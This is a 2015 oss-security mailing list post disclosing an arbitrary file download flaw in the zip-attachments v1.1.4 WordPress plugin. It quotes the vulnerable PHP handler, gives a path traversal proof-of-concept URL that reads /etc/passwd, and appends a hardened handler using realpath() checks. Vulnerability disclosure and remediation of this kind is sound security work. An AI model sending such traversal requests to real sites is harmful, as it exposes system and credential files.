Date: Fri, 12 Jun 2015 14:35:16 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: zip-attachments v1.1.4 WordPress plugin arbitrary file download vulnerability.

May I please have a CVE for this issue:

Title: zip-attachments v1.1.4 WordPress plugin arbitrary file download vulnerability.
Author: Larry W. Cashdollar
Date: 6/10/2015
Vendor: Rick Torres @ricard_dev
Vendor Notified: 6/11/2015
Fixed in: v1.1.5 by vendor.
Download: https://wordpress.org/plugins/zip-attachments/
CVEID: TBD
Description: Simple and lightweight plugin to add a "Download" button to your posts, pages or custom post types.

Vulnerability: zip-attachments allows arbitrary file downloads because it doesn't check the download path of the requested file.

In zip-attachments/download.php, there is no check to see if the file is outside of the intended download path:

  <?php
  // Vulnerable handler as shipped in v1.1.4: $_GET['za_file'] is used directly as a
  // filesystem path, with no check that it stays inside the plugin's download directory.
  if(isset($_REQUEST['za_file']) && !empty($_REQUEST['za_file'])){

      $file = $_GET['za_file'];          // client-controlled path
      $filename = $_GET['za_filename'];  // client-controlled download name, echoed into a header

      header('Content-Type: application/zip');
      header('Content-Length: ' . filesize($file));
      header('Content-Disposition: attachment; filename="'.$filename.'.zip"');

      readfile($file);   // sends whatever $file points to
      unlink($file);     // then deletes it
  }

Any file readable by the httpd process can be downloaded.

PoC:
http://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
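The following is an added example of how a download handler like the one above can be hardened; it is not the plugin's code and not the vendor's v1.1.5 fix. It assumes the zip files the plugin serves live in one directory (ZA_DOWNLOAD_DIR, a placeholder path) and that a valid request names a file in that directory. The key step is resolving the request with realpath() and checking that the canonical result still lies under the base directory, so that "../" segments and symlinks cannot reach files elsewhere on the host.

```php
<?php
// Hardened download handler (added example, not the plugin's own code).
// Assumption: all downloadable archives live directly in ZA_DOWNLOAD_DIR.
define('ZA_DOWNLOAD_DIR', '/var/www/html/wp-content/uploads/zip-attachments'); // placeholder path

/**
 * Resolve a client-supplied name to an absolute path inside $baseDir.
 * Returns the canonical path, or null when the request does not name an
 * existing regular file inside the allowed directory.
 */
function za_resolve_download(string $requested, string $baseDir): ?string {
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory missing: refuse rather than serve anything
    }
    // Drop any directory component the client sent ("../../etc/passwd" -> "passwd").
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // realpath() collapses dot segments and symlinks, so the prefix check below
    // compares canonical paths rather than the client-controlled string.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the allowed directory (e.g. through a symlink)
    }
    return $path;
}

// Same request flow as the original handler, but every filesystem call uses the validated path.
if (isset($_REQUEST['za_file']) && !empty($_REQUEST['za_file'])) {
    $file = za_resolve_download((string) $_REQUEST['za_file'], ZA_DOWNLOAD_DIR);
    if ($file === null) {
        http_response_code(404);
        exit;
    }
    // The display name ends up in a response header, so restrict it to a safe character set.
    $rawName  = (string) ($_REQUEST['za_filename'] ?? 'download');
    $filename = preg_replace('/[^A-Za-z0-9._-]/', '_', $rawName);

    header('Content-Type: application/zip');
    header('Content-Length: ' . filesize($file));
    header('Content-Disposition: attachment; filename="' . $filename . '.zip"');
    readfile($file);
    unlink($file);
}
```

Note that basename() alone is not sufficient on its own: the realpath() prefix comparison is what defends against a symlink inside the download directory pointing elsewhere, and checking is_file() rejects directories and special files before anything is sent or deleted.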
